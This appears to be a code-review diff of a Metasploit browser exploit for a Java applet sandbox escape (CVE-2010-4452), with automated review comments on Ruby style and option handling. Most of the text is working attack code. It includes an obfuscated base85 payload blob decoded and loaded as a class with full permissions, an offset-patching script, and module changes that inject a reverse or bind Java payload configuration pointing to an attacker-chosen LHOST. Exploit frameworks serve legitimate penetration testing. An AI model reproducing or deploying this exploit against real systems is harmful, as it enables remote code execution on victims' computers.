"L]~EMr+/=s%$XkPl]~WZ#MPHA=u1.n&-VV0/]MKKP#6PTB##)7M&53(-awT]V]1`6/%nv%" + + "-%SQw/t=~hv6JMSM+aXcR(0^eN#6GjQ;b]nv]S6uN,Dq^h~C(BP#3CD>Al'N%$$HH5#6G$" + + "H]QR$<$~jsN?W[=D10FVi+^>$Z]~NSw+.3aF3`$Pu&58a>Al&VK)c6V:_,*$r]ql-@%#,3" + + "p%=w_$$Y9Q]/ki#W%:KE]#4*:h)c7Jd3j8`q'MP-A$Y9N`]RU6*MPH;;u1.n(]M]Y%Xd9Z" + + "(]QR.UW_f$c$?eX;+liY80S0<$#6G'O0Mj[v$;_I[T1l])$=O'v'hkE1$=O$i#6J:>$;@A" + + "d13QBF]]0#(Xd>J[#6#'8$?f/(;<@lj3)$wm=a1%T=`sqS###%)##kS+#8.%Z#6=g0#'']" + + "I##5/(0O=`_[S6c8#u%t.#6HE^$V~$9##,+9##G;'##5/*#5~C(######87)H##,+.###%" + + ".##5/f#####^?6,i#6(,rUeJ5k(v_23U.i)n(vq>5V+e2m~_$oo#6&sQ]^HL1#60Wc^@2c" + + "i#612s##);Q#####").replace('~', '\\'); +byte[] payload = new byte[9132]; +for (int i = 0; i < DATA.length()/5; i++) { + long val=0; + for (int j = 0; j < 5; j++) val = val * 85 + (DATA.charAt(i*5+j)-'#'); + for (int j = 0; j < 4; j++, val >>= 8) payload[i*4+j] = (byte)val; +} +Class I = int.class, BA = byte[].class; +Class PD = java.security.ProtectionDomain.class; +final java.security.Permissions permissions = new java.security.Permissions(); +permissions.add(new java.security.AllPermission()); +final java.security.ProtectionDomain pd = new java.security.ProtectionDomain(new + java.security.CodeSource(new java.net.URL("file:///"), + new java.security.cert.Certificate[0]), permissions); +java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod("defineClass", + new Class[] {String.class, BA, I, I, PD}); +m.setAccessible(true); +Class c = (Class) m.invoke(new java.net.URLClassLoader(new java.net.URL[0]), + new Object[] {null, payload, new Integer(0), new Integer(1888), pd}); +byte[] payload2 = new byte[7244]; +System.arraycopy(payload, 1888, payload2, 0, 7244); +c.getConstructor(new Class[] {PD, BA, BA}) + .newInstance(new Object[] {pd, CONFIG.getBytes(), payload2}); } catch( Exception e ) { diff --git a/external/source/exploits/cve-2010-4452/get_offsets.rb b/external/source/exploits/cve-2010-4452/get_offsets.rb index 7278f34bf1..8b134e965b 100755 
--- a/external/source/exploits/cve-2010-4452/get_offsets.rb
+++ b/external/source/exploits/cve-2010-4452/get_offsets.rb
@@ -1,7 +1,11 @@
 #!/usr/bin/env ruby
+dat = nil
 dat = File.open(ARGV[0], 'rb') { |fd| fd.read }
-
-puts "cmd_off = 0x%x" % dat.index("\x00\x08calc.exe")
-puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX")
+if dat
+	puts "config_off = 0x%x" % dat.index("\x00\x08CONFIGZZ")
+	puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX")
+else
+	"No data?!"
+end
diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb
index 8858de1a62..da029586db 100644
--- a/modules/exploits/windows/browser/java_codebase_trust.rb
+++ b/modules/exploits/windows/browser/java_codebase_trust.rb
@@ -21,12 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		super( update_info( info,
 			'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
 			'Description' => %q{
-					This module exploits a vulnerability in Java Runtime Environment
-					that allows an attacker to escape the Java Sandbox. By supplying a
-					codebase that points at a trusted directory and a code that is a URL that
-					does not contain an dots an applet can run without the sandbox.
+					This module exploits a vulnerability in the Java Runtime Environment
+					that allows an attacker to run an applet outside of the Java Sandbox. When
+					an applet is invoked with:
 
-					The vulnerability affects version 6 prior to update 24.
+					1. A "codebase" parameter that points at a trusted directory
+					2. A "code" parameter that is a URL that does not contain any dots
+
+					the applet will run outside of the sandbox.
+
+					This vulnerability affects JRE prior to version 6 update 24.
 			},
 			'License' => MSF_LICENSE,
 			'Author' => [
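Review bot: The `else` branch of the new `if dat` is a bare string literal, `"No data?!"`, which Ruby evaluates and discards, so the failure path prints nothing and the script still exits 0; it should be `abort "No data?!"` (message on stderr plus non-zero exit). The added `dat = nil` is redundant because the block form of `File.open` returns the block's value, and an unreadable file makes `File.open` raise rather than leave `dat` nil, so the guard never fires on that path. The failure that can actually happen, a class file without the `"\x00\x08CONFIGZZ"` or `"\x00\x07AppletX"` marker, is unhandled: `dat.index` returns nil and `"0x%x" % nil` raises TypeError; `off = dat.index("\x00\x08CONFIGZZ") or abort "CONFIGZZ marker not found"` per marker would give a usable message instead of a backtrace.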
@@ -42,13 +46,30 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
 					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
 				],
-			'Platform' => [ 'java', 'win' ],
-			'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Platform' => [ 'java' ], #, 'win' ],
+			'Payload' =>
+				{
+					'Space' => 20480,
+					'BadChars' => '',
+					'DisableNops' => true,
+					'Compat' =>
+						{
+							# bind doesn't make much sense for client sides
+							'ConnectionType' => '-find -bind'
+						}
+				},
 			'Targets' =>
 				[
 					# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
 					# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
-					[ 'Automatic (no payload)', { } ]
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java',
+						}
+					],
+
+					# Native payloads aren't currently supported (only work with jar/war)
 =begin
 					[ 'Windows x86',
 						{
@@ -56,12 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'win',
 						}
 					],
-					[ 'Generic (Java Payload)',
-						{
-							'Arch' => ARCH_JAVA,
-							'Platform' => 'java',
-						}
-					],
 =end
 				],
 			'DefaultTarget' => 0,
@@ -70,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptString.new('CMD', [ false, "Command to run.", "calc.exe"]),
+				# This is the default for a 32-bit Windows install
 				OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)", "C:\\Program Files\\java\\jre6\\lib\\ext"]),
 			], self.class)
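Review bot: `'Platform' => [ 'java' ], #, 'win' ],` in the -42 hunk leaves a fragment of the old value in a trailing comment, which reads as commented-out code rather than as an explanation; either drop it or state the reason, e.g. `'Platform' => [ 'java' ], # native (win) targets disabled, see the =begin block below`. The two comments kept above the new target, `# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23` and `# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23`, were written against the removed 'Automatic (no payload)' target, and nothing in the diff shows they were re-checked against the Java-payload target, so they deserve re-verification or a date/target label. The `'Compat'` block's `-find -bind` restriction is the one place where the reasoning is spelled out inline; the same treatment for the platform change would make the hash self-explanatory. The hash literal belongs to the `update_info` call that begins before the hunk.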
@@ -98,27 +113,37 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Do what get_uri does so that we can replace it in the string
 		host = Rex::Socket.source_address(cli.peerhost)
 		host_num = Rex::Socket.addr_aton(host).unpack('N').first
-
-		codebase = "file:" + datastore['LIBPATH']
 		code_url = jpath.sub(host, host_num.to_s)
-		cmd = datastore['CMD']
-		cmd_off = 0xb4
+		codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext"
+		codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext"
 
-		cn_off = 0xfc
+		config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n"
+		# The java payloads decide to be reverse if LHOST is set.
+		config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/
+		config_off = 0x10e
+
+		cn_off = 0x2f76
 
 		case request.uri
 		when /\.class$/
+			# NOTE: the payload for this module is implemented in the .class file directly.
+			#
+			# This is due to the following:
+			# 1. The file must be a single .class file
+			# 2. The class inside must derive from Applet
+			#
+			# As such, we do not use the traditional payload generation facilities.
 			#p = regenerate_payload(cli)
 			print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")
 
 			cls = @java_class.dup
-			cls[cmd_off,2] = [cmd.length].pack('n')
-			cls[cmd_off+2,8] = cmd
+			cls[config_off,2] = [config.length].pack('n')
+			cls[config_off+2,8] = config
 
-			cn_off += (cmd.length - 8) # the original length was 8 (calc.exe)
+			cn_off += (config.length - 8) # the original length was 8 (CONFIGZZ)
 			cls[cn_off,2] = [code_url.length].pack('n')
 			cls[cn_off+2,7] = code_url
@@ -137,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			EOS
 			print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
 			send_response_html(cli, html)
-			handler(cli)
 		end
 	end
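Review bot: In the -98 hunk `codebase` is assigned twice from string literals, the first (`"C:\\Program Files (x86)\\java\\jre6\\lib\\ext"`) being dead, and the removed `codebase = "file:" + datastore['LIBPATH']` was the only reader of the LIBPATH option, which the -70 hunk keeps and annotates with `# This is the default for a 32-bit Windows install`; the option is therefore silently ignored and its default value is duplicated here as a literal. Restoring `codebase = "file:" + datastore['LIBPATH']` and deleting the two literal assignments keeps option, description and behaviour in agreement. `config_off = 0x10e` and `cn_off = 0x2f76` are positions inside the shipped data/exploits/cve-2010-4452/AppletX.class that external/source/exploits/cve-2010-4452/get_offsets.rb computes, so a comment such as `# Offsets into data/exploits/cve-2010-4452/AppletX.class; rerun get_offsets.rb whenever the class is rebuilt` would stop them from going stale unnoticed. The `cls[config_off+2,8] = config` splice also depends on the placeholder in the class being exactly 8 bytes, a fact currently recorded only in the trailing comment on the `cn_off +=` line. The request handler this code belongs to starts before the hunk and continues after it.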